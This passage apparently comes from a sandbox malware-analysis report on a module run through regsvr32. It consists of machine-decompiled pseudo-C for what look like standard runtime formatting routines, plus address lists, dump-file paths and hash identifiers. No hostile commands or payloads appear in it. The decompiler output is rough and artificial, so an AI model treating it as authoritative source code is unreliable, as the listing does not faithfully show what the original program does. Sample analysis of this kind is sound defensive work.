				if (r13d + r12d - r15d < 0) goto 0x8002cfab;
				goto 0x8002cff5;
				 *_t331 =  *_t331 | 0xffffffff;
				if ( *((intOrPtr*)(_t306 + 0x4c)) != r13b) goto 0x8002d126;
				if ( *((intOrPtr*)(_t306 + 0x48)) <= 0) goto 0x8002d126;
				_t359 =  *((intOrPtr*)(_t306 + 8));
				if ( *((intOrPtr*)(_t359 + 0x28)) != 0) goto 0x8002d023;
				0x800338e0();
				if ( *((intOrPtr*)(_t306 + 0x48)) == 0) goto 0x8002d0a8;
				_t90 = _t359 + 0x18; // 0x4c08245c8948cccc
				_v72 = 0;
				_t312 =  &_v72;
				if (E00000001180040E3C(0, _t220, _t306, _t312,  *((intOrPtr*)(_t306 + 0x40)), _t327 + 2, _t331,  *((intOrPtr*)(_t306 + 0x40)),  *((intOrPtr*)( *_t90 + 8)),  *((intOrPtr*)(_t306 + 8))) <= 0) goto 0x8002d11a;
				if (( *( *_t360 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002d077;
				if ( *((long long*)( *_t360 + 8)) == 0) goto 0x8002d089;
				if (E000000011800414D8(_v72 & 0x0000ffff, _t306,  *_t360,  *((intOrPtr*)(_t306 + 8)),  *((intOrPtr*)(_t306 + 8))) == 0xffff) goto 0x8002d08e;
				 *(_t306 + 0x20) =  *(_t306 + 0x20) + 1;
				goto 0x8002d092;
				 *(_t306 + 0x20) =  *(_t306 + 0x20) | 0xffffffff;
				r12d = 1;
				if (0 + r12d !=  *((intOrPtr*)(_t306 + 0x48))) goto 0x8002d02d;
				r13d = 0;
				if ( *_t331 - r13d < 0) goto 0x8002d16c;
				if ((r12b & 0) == 0) goto 0x8002d16c;
				if (r15d <= 0) goto 0x8002d16c;
				if ((r12b &  *( *_t360 + 0x14) >> 0x0000000c) == 0) goto 0x8002d0ea;
				if ( *((intOrPtr*)( *_t360 + 8)) == _t359) goto 0x8002d104;
				if (E000000011800414D8(0x20, _t306,  *_t360,  *((intOrPtr*)(_t306 + 8)),  *((intOrPtr*)(_t306 + 8))) == 0xffff) goto 0x8002d169;
				_t115 = _t312 + 1; // 0x10000
				 *_t331 = _t115;
				if ( *_t331 == 0xfffffffe) goto 0x8002d16c;
				if (r13d + r12d - r15d < 0) goto 0x8002d0d3;
				goto 0x8002d16c;
				 *(_t306 + 0x20) =  *(_t306 + 0x20) | 0xffffffff;
				r12d = 1;
				goto 0x8002d0a8;
				r8d =  *((intOrPtr*)(_t306 + 0x48));
				if ((r12b &  *( *_t360 + 0x14) >> 0x0000000c) == 0) goto 0x8002d151;
				if ( *((intOrPtr*)( *_t360 + 8)) != _t359) goto 0x8002d151;
				 *_t331 =  *_t331 + r8d;
				goto 0x8002d0ab;
				_v88 =  *((intOrPtr*)(_t306 + 8));
				E000000011800362BC(_t306, _t360,  *((intOrPtr*)(_t306 + 0x40)), _t331,  *((intOrPtr*)(_t306 + 0x40)) + _t164, _t331);
				goto 0x8002d0ab;
				 *_t331 =  *_t331 | 0xffffffff;
				return E000000011800028F0(r12b,  *( *_t360 + 0x14) >> 0xc, _v56 ^ _t340);
			}





































                                                                                                              0x18002cccc
                                                                                                              0x18002cccc
                                                                                                              0x18002cccc
                                                                                                              0x18002cccc
                                                                                                              0x18002cccc
                                                                                                              0x18002cccc
                                                                                                              0x18002ccd1
                                                                                                              0x18002ccd6
                                                                                                              0x18002cce4
                                                                                                              0x18002cce8
                                                                                                              0x18002ccf2
                                                                                                              0x18002ccf7
                                                                                                              0x18002cd00
                                                                                                              0x18002cd03
                                                                                                              0x18002cd03
                                                                                                              0x18002cd06
                                                                                                              0x18002cd06
                                                                                                              0x18002cd0a
                                                                                                              0x18002cd0e
                                                                                                              0x18002cd10
                                                                                                              0x18002cd1a
                                                                                                              0x18002cd24
                                                                                                              0x18002cd2a
                                                                                                              0x18002cd34
                                                                                                              0x18002cd3e
                                                                                                              0x18002cd43
                                                                                                              0x18002cd49
                                                                                                              0x18002cd4f
                                                                                                              0x18002cd59
                                                                                                              0x18002cd61
                                                                                                              0x18002cd66
                                                                                                              0x18002cd6b
                                                                                                              0x18002cd70
                                                                                                              0x18002cd78
                                                                                                              0x18002cd7d
                                                                                                              0x18002cd86
                                                                                                              0x18002cd8c
                                                                                                              0x18002cd92
                                                                                                              0x18002cd98
                                                                                                              0x18002cd9e
                                                                                                              0x18002cda4
                                                                                                              0x18002cdaa
                                                                                                              0x18002cdaf
                                                                                                              0x18002cdb3
                                                                                                              0x18002cdb5
                                                                                                              0x18002cdba
                                                                                                              0x18002cdbc
                                                                                                              0x18002cdc3
                                                                                                              0x18002cdca
                                                                                                              0x18002cdcc
                                                                                                              0x18002cdd7
                                                                                                              0x18002cdd9
                                                                                                              0x18002cddd
                                                                                                              0x18002cde2
                                                                                                              0x18002cde5
                                                                                                              0x18002cdea
                                                                                                              0x18002cdec
                                                                                                              0x18002cdf1
                                                                                                              0x18002cdf3
                                                                                                              0x18002cdf9
                                                                                                              0x18002cdfe
                                                                                                              0x18002ce00
                                                                                                              0x18002ce05
                                                                                                              0x18002ce0a
                                                                                                              0x18002ce0e
                                                                                                              0x18002ce17
                                                                                                              0x18002ce1d
                                                                                                              0x18002ce22
                                                                                                              0x18002ce29
                                                                                                              0x18002ce2e
                                                                                                              0x18002ce3c
                                                                                                              0x18002ce46
                                                                                                              0x18002ce4c
                                                                                                              0x18002ce51
                                                                                                              0x18002ce56
                                                                                                              0x18002ce5d
                                                                                                              0x18002ce66
                                                                                                              0x18002ce68
                                                                                                              0x18002ce6e
                                                                                                              0x18002ce71
                                                                                                              0x18002ce75
                                                                                                              0x18002ce85
                                                                                                              0x18002ce89
                                                                                                              0x18002ce92
                                                                                                              0x18002ce94
                                                                                                              0x18002ce9e
                                                                                                              0x18002ceaa
                                                                                                              0x18002ceae
                                                                                                              0x18002ceb0
                                                                                                              0x18002ceb9
                                                                                                              0x18002cebf
                                                                                                              0x18002cec4
                                                                                                              0x18002cecd
                                                                                                              0x18002ced1
                                                                                                              0x18002ced7
                                                                                                              0x18002cedb
                                                                                                              0x18002cee1
                                                                                                              0x18002ceed
                                                                                                              0x18002ceff
                                                                                                              0x18002cf0c
                                                                                                              0x18002cf24
                                                                                                              0x18002cf26
                                                                                                              0x18002cf32
                                                                                                              0x18002cf38
                                                                                                              0x18002cf40
                                                                                                              0x18002cf42
                                                                                                              0x18002cf44
                                                                                                              0x18002cf4c
                                                                                                              0x18002cf56
                                                                                                              0x18002cf63
                                                                                                              0x18002cf6c
                                                                                                              0x18002cf6e
                                                                                                              0x18002cf70
                                                                                                              0x18002cf72
                                                                                                              0x18002cf7f
                                                                                                              0x18002cf82
                                                                                                              0x18002cf85
                                                                                                              0x18002cf95
                                                                                                              0x18002cf9d
                                                                                                              0x18002cfa9
                                                                                                              0x18002cfb7
                                                                                                              0x18002cfc0
                                                                                                              0x18002cfda
                                                                                                              0x18002cfde
                                                                                                              0x18002cfe1
                                                                                                              0x18002cfe6
                                                                                                              0x18002cfee
                                                                                                              0x18002cff0
                                                                                                              0x18002cff2
                                                                                                              0x18002cff9
                                                                                                              0x18002d004
                                                                                                              0x18002d00a
                                                                                                              0x18002d014
                                                                                                              0x18002d019
                                                                                                              0x18002d02b
                                                                                                              0x18002d02d
                                                                                                              0x18002d038
                                                                                                              0x18002d03d
                                                                                                              0x18002d050
                                                                                                              0x18002d06b
                                                                                                              0x18002d075
                                                                                                              0x18002d087
                                                                                                              0x18002d089
                                                                                                              0x18002d08c
                                                                                                              0x18002d08e
                                                                                                              0x18002d095
                                                                                                              0x18002d0a6
                                                                                                              0x18002d0a8
                                                                                                              0x18002d0ae
                                                                                                              0x18002d0bd
                                                                                                              0x18002d0cd
                                                                                                              0x18002d0df
                                                                                                              0x18002d0e8
                                                                                                              0x18002d102
                                                                                                              0x18002d106
                                                                                                              0x18002d109
                                                                                                              0x18002d10e
                                                                                                              0x18002d116
                                                                                                              0x18002d118
                                                                                                              0x18002d11a
                                                                                                              0x18002d11e
                                                                                                              0x18002d124
                                                                                                              0x18002d12d
                                                                                                              0x18002d13e
                                                                                                              0x18002d147
                                                                                                              0x18002d149
                                                                                                              0x18002d14c
                                                                                                              0x18002d151
                                                                                                              0x18002d15f
                                                                                                              0x18002d164
                                                                                                              0x18002d169
                                                                                                              0x18002d199

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e5306d572ec6042d4ee2470e7664592b19945edf766be0a8804a6cd629e04ec
                                                                                                              • Instruction ID: e3f56a40636832230b55b757e182cdc7a1f7076bcd3108387d85e5c6dc8352c0
                                                                                                              • Opcode Fuzzy Hash: 2e5306d572ec6042d4ee2470e7664592b19945edf766be0a8804a6cd629e04ec
                                                                                                              • Instruction Fuzzy Hash: E8E1DF3620064886EBEB9F298040BEA37A1F74CBC4F59C126AE45477D4DF35CE8AC342
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003E0D0 Relevance: .4, Instructions: 357COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0000000118003E0D0(void* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t12;
				signed long long _t15;
				void* _t25;
				void* _t26;
				signed long long _t27;

				_t25 = _t26 - 0x168;
				_t27 = _t26 - 0x268;
				_t15 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t25 + 0x150) = _t15 ^ _t27;
				r15d = 0;
				 *((long long*)(_t27 + 0x70)) = __r8;
				 *((long long*)(_t27 + 0x78)) = __rdx;
				 *((long long*)(_t27 + 0x30)) =  *((intOrPtr*)(_t25 + 0x1d0));
				 *((long long*)(_t27 + 0x68)) =  *((intOrPtr*)(_t25 + 0x1d8));
				if (__rcx != 0) goto 0x8003e158;
				return E000000011800028F0(0, _t12,  *(_t25 + 0x150) ^ _t27);
			}








                                                                                                              0x18003e0dd
                                                                                                              0x18003e0e5
                                                                                                              0x18003e0ec
                                                                                                              0x18003e0f6
                                                                                                              0x18003e104
                                                                                                              0x18003e111
                                                                                                              0x18003e119
                                                                                                              0x18003e121
                                                                                                              0x18003e129
                                                                                                              0x18003e131
                                                                                                              0x18003e157

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 4023145424-0
                                                                                                              • Opcode ID: e35c9c83b6621267efbfa96a6f02049159a1fac8090f9d4154a59d83bf2ac146
                                                                                                              • Instruction ID: 8b4f650e79c2adfae2fb9d7fec3dff5ee1ac8f9d74da4d170ae4c956a3ed5e78
                                                                                                              • Opcode Fuzzy Hash: e35c9c83b6621267efbfa96a6f02049159a1fac8090f9d4154a59d83bf2ac146
                                                                                                              • Instruction Fuzzy Hash: BDE1A236204AC885EBA79B61D4507EB67A0F79EBC8F418225FE49876C5EF38C649C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002B49C Relevance: .3, Instructions: 345COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 23%
                                                                                                              			E0000000118002B49C(void* __edi, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				intOrPtr _t120;
				void* _t123;
				signed int _t144;
				signed char _t148;
				void* _t151;
				signed char _t154;
				unsigned int _t160;
				signed char _t161;
				unsigned int _t168;
				intOrPtr _t187;
				void* _t188;
				void* _t196;
				signed long long _t263;
				long long _t279;
				intOrPtr* _t283;
				intOrPtr* _t286;
				signed int* _t301;
				void* _t304;
				void* _t308;
				void* _t309;
				void* _t324;
				intOrPtr* _t326;

				_t303 = __rsi;
				_t188 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t308 = _t309;
				_t263 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t263 ^ _t309 - 0x00000050;
				_t120 =  *((intOrPtr*)(__rcx + 0x39));
				_t279 = __rcx;
				r13d = 1;
				dil = 0x78;
				r14b = 0x58;
				r15b = 0x41;
				_t196 = _t120 - 0x64;
				if (_t196 > 0) goto 0x8002b53f;
				if (_t196 == 0) goto 0x8002b5a2;
				if (_t120 == r15b) goto 0x8002b5af;
				if (_t120 == 0x43) goto 0x8002b522;
				if (_t120 - 0x44 <= 0) goto 0x8002b5b8;
				if (_t120 - 0x47 <= 0) goto 0x8002b5af;
				if (_t120 == 0x53) goto 0x8002b564;
				if (_t120 == r14b) goto 0x8002b535;
				if (_t120 == 0x5a) goto 0x8002b52e;
				if (_t120 == 0x61) goto 0x8002b5af;
				if (_t120 != 0x63) goto 0x8002b5b8;
				E0000000118003102C(_t120, _t120 - 0x63, __rcx);
				goto 0x8002b5b4;
				E0000000118002ECAC(__rcx);
				goto 0x8002b5b4;
				_t123 = E0000000118001E320(r13b, __rcx, __rcx, __rsi, _t308);
				goto 0x8002b5b4;
				if (_t123 - 0x67 <= 0) goto 0x8002b5af;
				if (_t123 == 0x69) goto 0x8002b5a2;
				if (_t123 == 0x6e) goto 0x8002b59b;
				if (_t123 == 0x6f) goto 0x8002b57b;
				if (_t123 == 0x70) goto 0x8002b56b;
				if (_t123 == 0x73) goto 0x8002b564;
				if (_t123 == 0x75) goto 0x8002b5a6;
				if (_t123 != dil) goto 0x8002b5b8;
				goto 0x8002b538;
				E00000001180032684(__rcx);
				goto 0x8002b5b4;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				goto 0x8002b535;
				_t160 =  *(__rcx + 0x28);
				if ((r13b & _t160 >> 0x00000005) == 0) goto 0x8002b58f;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t160;
				E0000000118001B310(0, __rcx, __rcx, _t303, _t308);
				goto 0x8002b5b4;
				0x80031ae4();
				goto 0x8002b5b4;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				E0000000118001CB18(0, __rcx, __rcx, _t303, _t308);
				goto 0x8002b5b4;
				if (E0000000118002F2FC(0, _t188, __rcx, __rcx, _t303, _t308) != 0) goto 0x8002b5bf;
				goto 0x8002b8a5;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002b8a2;
				_t161 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0x8002b60c;
				if ((r13b & 0) == 0) goto 0x8002b5f1;
				_v72 = 0x2d;
				goto 0x8002b609;
				if ((r13b & _t161) == 0) goto 0x8002b5fc;
				_v72 = 0x2b;
				goto 0x8002b609;
				if ((r13b & 0) == 0) goto 0x8002b60c;
				_v72 = 0x20;
				_t304 = _t324;
				_t187 =  *((intOrPtr*)(__rcx + 0x39));
				if ((_t187 - r14b & 0x000000df) != 0) goto 0x8002b627;
				if ((r13b & _t161 >> 0x00000005) == 0) goto 0x8002b627;
				r8b = r13b;
				goto 0x8002b62a;
				r8b = 0;
				_t144 = _t187 - r15b & 0xffffff00 | (_t187 - r15b & 0x000000df) == 0x00000000;
				if (r8b != 0) goto 0x8002b63d;
				if (_t144 == 0) goto 0x8002b658;
				 *((char*)(_t308 + _t304 - 0x20)) = 0x30;
				if (_t187 == r14b) goto 0x8002b64c;
				if (_t187 != r15b) goto 0x8002b64f;
				dil = r14b;
				 *((intOrPtr*)(_t308 + _t304 - 0x1f)) = dil;
				r15d =  *((intOrPtr*)(__rcx + 0x2c));
				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
				r15d = r15d;
				if ((_t161 & 0x0000000c) != 0) goto 0x8002b6c8;
				if (r15d <= 0) goto 0x8002b6c8;
				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002b693;
				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8002b6ac;
				0x80041944();
				if (_t144 == 0xffffffff) goto 0x8002b6c4;
				 *(__rcx + 0x20) = __rcx + 1;
				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8002b6c8;
				if (0 + r13d - r15d < 0) goto 0x8002b673;
				goto 0x8002b6c8;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
				_t60 = _t279 + 0x460; // 0x4a1
				_t326 = _t60;
				_t61 = _t279 + 0x20; // 0x61
				_t301 = _t61;
				if ((r13b &  *( *_t326 + 0x14) >> 0x0000000c) == 0) goto 0x8002b6f3;
				if ( *((long long*)( *_t326 + 8)) != 0) goto 0x8002b6f3;
				 *_t301 =  *_t301;
				goto 0x8002b70a;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t67 =  &_v72; // -31
				r8d = 0;
				_t283 = _t326;
				E000000011800361F0(__rcx + 1, __rcx, _t283, _t67, _t304 + 2, _t308, _t301);
				_t168 =  *(__rcx + 0x28);
				_t148 = _t168 >> 3;
				if ((r13b & _t148) == 0) goto 0x8002b770;
				if ((r13b & _t168 >> 0x00000002) != 0) goto 0x8002b770;
				if (r15d <= 0) goto 0x8002b770;
				if ((r13b &  *( *_t326 + 0x14) >> 0x0000000c) == 0) goto 0x8002b742;
				if ( *((long long*)( *_t326 + 8)) == 0) goto 0x8002b757;
				0x80041944();
				if (_t148 == 0xffffffff) goto 0x8002b76d;
				 *_t301 = _t283 + 1;
				if ( *_t301 == 0xfffffffe) goto 0x8002b770;
				if (0 + r13d - r15d < 0) goto 0x8002b72a;
				goto 0x8002b770;
				 *_t301 =  *_t301 | 0xffffffff;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002b805;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002b805;
				_t83 =  &_v68; // -27
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_t84 =  &_v72; // -31
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00000001180040970(__rcx, _t84, _t83, _t308,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8002b800;
				r8d = _v72;
				if (r8d == 0) goto 0x8002b800;
				if ((r13b &  *( *_t326 + 0x14) >> 0x0000000c) == 0) goto 0x8002b7e2;
				if ( *((long long*)( *_t326 + 8)) != 0) goto 0x8002b7e2;
				 *_t301 =  *_t301 + r8d;
				goto 0x8002b7f6;
				_v88 =  *((intOrPtr*)(_t279 + 8));
				_t96 =  &_v68; // -27
				_t151 = E000000011800361F0(_t150, _t279, _t326, _t96, _t304 + 2, _t308, _t301);
				if (0 + r13d !=  *(_t279 + 0x48)) goto 0x8002b78a;
				goto 0x8002b841;
				 *_t301 =  *_t301 | 0xffffffff;
				goto 0x8002b841;
				r8d =  *(_t279 + 0x48);
				if ((r13b &  *( *_t326 + 0x14) >> 0x0000000c) == 0) goto 0x8002b82e;
				if ( *((long long*)( *_t326 + 8)) != 0) goto 0x8002b82e;
				 *_t301 =  *_t301 + r8d;
				goto 0x8002b841;
				_v88 =  *((intOrPtr*)(_t279 + 8));
				_t286 = _t326;
				E000000011800361F0(_t151, _t279, _t286,  *((intOrPtr*)(_t279 + 0x40)), _t304 + 2, _t308, _t301);
				if ( *_t301 < 0) goto 0x8002b8a2;
				_t154 =  *(_t279 + 0x28) >> 2;
				if ((r13b & _t154) == 0) goto 0x8002b8a2;
				if (r15d <= 0) goto 0x8002b8a2;
				if ((r13b &  *( *_t326 + 0x14) >> 0x0000000c) == 0) goto 0x8002b874;
				if ( *((long long*)( *_t326 + 8)) == 0) goto 0x8002b889;
				0x80041944();
				if (_t154 == 0xffffffff) goto 0x8002b89f;
				 *_t301 = _t286 + 1;
				if ( *_t301 == 0xfffffffe) goto 0x8002b8a2;
				if (0 + r13d - r15d < 0) goto 0x8002b85c;
				goto 0x8002b8a2;
				 *_t301 =  *_t301 | 0xffffffff;
				return E000000011800028F0(r13b,  *_t301, _v56 ^ _t309 - 0x00000050);
			}
































                                                                                                              0x18002b49c
                                                                                                              0x18002b49c
                                                                                                              0x18002b49c
                                                                                                              0x18002b4a1
                                                                                                              0x18002b4a6
                                                                                                              0x18002b4b4
                                                                                                              0x18002b4bb
                                                                                                              0x18002b4c5
                                                                                                              0x18002b4c9
                                                                                                              0x18002b4cc
                                                                                                              0x18002b4cf
                                                                                                              0x18002b4d5
                                                                                                              0x18002b4d8
                                                                                                              0x18002b4db
                                                                                                              0x18002b4de
                                                                                                              0x18002b4e0
                                                                                                              0x18002b4e2
                                                                                                              0x18002b4eb
                                                                                                              0x18002b4f3
                                                                                                              0x18002b4f7
                                                                                                              0x18002b4ff
                                                                                                              0x18002b507
                                                                                                              0x18002b50c
                                                                                                              0x18002b510
                                                                                                              0x18002b514
                                                                                                              0x18002b51c
                                                                                                              0x18002b524
                                                                                                              0x18002b529
                                                                                                              0x18002b52e
                                                                                                              0x18002b533
                                                                                                              0x18002b538
                                                                                                              0x18002b53d
                                                                                                              0x18002b541
                                                                                                              0x18002b545
                                                                                                              0x18002b549
                                                                                                              0x18002b54d
                                                                                                              0x18002b551
                                                                                                              0x18002b555
                                                                                                              0x18002b559
                                                                                                              0x18002b55e
                                                                                                              0x18002b562
                                                                                                              0x18002b564
                                                                                                              0x18002b569
                                                                                                              0x18002b56b
                                                                                                              0x18002b572
                                                                                                              0x18002b579
                                                                                                              0x18002b57b
                                                                                                              0x18002b586
                                                                                                              0x18002b588
                                                                                                              0x18002b58c
                                                                                                              0x18002b594
                                                                                                              0x18002b599
                                                                                                              0x18002b59b
                                                                                                              0x18002b5a0
                                                                                                              0x18002b5a2
                                                                                                              0x18002b5a8
                                                                                                              0x18002b5ad
                                                                                                              0x18002b5b6
                                                                                                              0x18002b5ba
                                                                                                              0x18002b5c3
                                                                                                              0x18002b5c9
                                                                                                              0x18002b5ce
                                                                                                              0x18002b5d4
                                                                                                              0x18002b5df
                                                                                                              0x18002b5e9
                                                                                                              0x18002b5eb
                                                                                                              0x18002b5ef
                                                                                                              0x18002b5f4
                                                                                                              0x18002b5f6
                                                                                                              0x18002b5fa
                                                                                                              0x18002b603
                                                                                                              0x18002b605
                                                                                                              0x18002b609
                                                                                                              0x18002b60c
                                                                                                              0x18002b616
                                                                                                              0x18002b620
                                                                                                              0x18002b622
                                                                                                              0x18002b625
                                                                                                              0x18002b627
                                                                                                              0x18002b631
                                                                                                              0x18002b637
                                                                                                              0x18002b63b
                                                                                                              0x18002b63d
                                                                                                              0x18002b645
                                                                                                              0x18002b64a
                                                                                                              0x18002b64c
                                                                                                              0x18002b64f
                                                                                                              0x18002b658
                                                                                                              0x18002b65c
                                                                                                              0x18002b660
                                                                                                              0x18002b666
                                                                                                              0x18002b671
                                                                                                              0x18002b683
                                                                                                              0x18002b691
                                                                                                              0x18002b6a2
                                                                                                              0x18002b6aa
                                                                                                              0x18002b6b2
                                                                                                              0x18002b6b8
                                                                                                              0x18002b6c0
                                                                                                              0x18002b6c2
                                                                                                              0x18002b6c4
                                                                                                              0x18002b6cc
                                                                                                              0x18002b6cc
                                                                                                              0x18002b6d6
                                                                                                              0x18002b6d6
                                                                                                              0x18002b6e3
                                                                                                              0x18002b6ed
                                                                                                              0x18002b6ef
                                                                                                              0x18002b6f1
                                                                                                              0x18002b6f3
                                                                                                              0x18002b6fb
                                                                                                              0x18002b6ff
                                                                                                              0x18002b702
                                                                                                              0x18002b705
                                                                                                              0x18002b70a
                                                                                                              0x18002b70f
                                                                                                              0x18002b715
                                                                                                              0x18002b71d
                                                                                                              0x18002b728
                                                                                                              0x18002b736
                                                                                                              0x18002b740
                                                                                                              0x18002b74d
                                                                                                              0x18002b755
                                                                                                              0x18002b75c
                                                                                                              0x18002b761
                                                                                                              0x18002b769
                                                                                                              0x18002b76b
                                                                                                              0x18002b76d
                                                                                                              0x18002b774
                                                                                                              0x18002b77e
                                                                                                              0x18002b78e
                                                                                                              0x18002b792
                                                                                                              0x18002b797
                                                                                                              0x18002b79b
                                                                                                              0x18002b7a4
                                                                                                              0x18002b7aa
                                                                                                              0x18002b7b6
                                                                                                              0x18002b7b8
                                                                                                              0x18002b7bf
                                                                                                              0x18002b7d1
                                                                                                              0x18002b7db
                                                                                                              0x18002b7dd
                                                                                                              0x18002b7e0
                                                                                                              0x18002b7e2
                                                                                                              0x18002b7ea
                                                                                                              0x18002b7f1
                                                                                                              0x18002b7fc
                                                                                                              0x18002b7fe
                                                                                                              0x18002b800
                                                                                                              0x18002b803
                                                                                                              0x18002b80c
                                                                                                              0x18002b81d
                                                                                                              0x18002b827
                                                                                                              0x18002b829
                                                                                                              0x18002b82c
                                                                                                              0x18002b82e
                                                                                                              0x18002b839
                                                                                                              0x18002b83c
                                                                                                              0x18002b844
                                                                                                              0x18002b849
                                                                                                              0x18002b84f
                                                                                                              0x18002b85a
                                                                                                              0x18002b868
                                                                                                              0x18002b872
                                                                                                              0x18002b87f
                                                                                                              0x18002b887
                                                                                                              0x18002b88e
                                                                                                              0x18002b893
                                                                                                              0x18002b89b
                                                                                                              0x18002b89d
                                                                                                              0x18002b89f
                                                                                                              0x18002b8ce

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5772cb1eaabcb1b2eb69e0b139bb9ecf688dc5f98debfc94303e1def97b5d5b
                                                                                                              • Instruction ID: 323bd2d0899ee4e1a1aad9eb2e17c4095a5cca43701195f58b88efcbef9d639e
                                                                                                              • Opcode Fuzzy Hash: b5772cb1eaabcb1b2eb69e0b139bb9ecf688dc5f98debfc94303e1def97b5d5b
                                                                                                              • Instruction Fuzzy Hash: 2EE1A076604A5C85EBAB8F2981443ED67A1E74CBD8F19C205EE499B3D5CF35CA4AC301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002E420 Relevance: .3, Instructions: 339COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 31%
                                                                                                              			E0000000118002E420(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				short _v64;
				short _v68;
				signed short _v72;
				long long _v88;
				void* __rdi;
				signed int _t124;
				void* _t125;
				void* _t156;
				void* _t163;
				unsigned int _t164;
				signed char _t165;
				signed int _t176;
				signed short _t188;
				void* _t191;
				void* _t195;
				signed long long _t256;
				long long _t274;
				long long _t276;
				long long _t277;
				intOrPtr* _t279;
				intOrPtr _t283;
				intOrPtr* _t285;
				signed long long _t291;
				intOrPtr _t294;
				intOrPtr _t296;
				void* _t298;
				signed int* _t299;
				long long _t302;
				void* _t304;
				signed long long _t305;
				intOrPtr _t308;
				void* _t314;
				signed long long _t316;
				void* _t317;
				intOrPtr* _t319;

				_t302 = __rbp;
				_t300 = __rsi;
				_t276 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
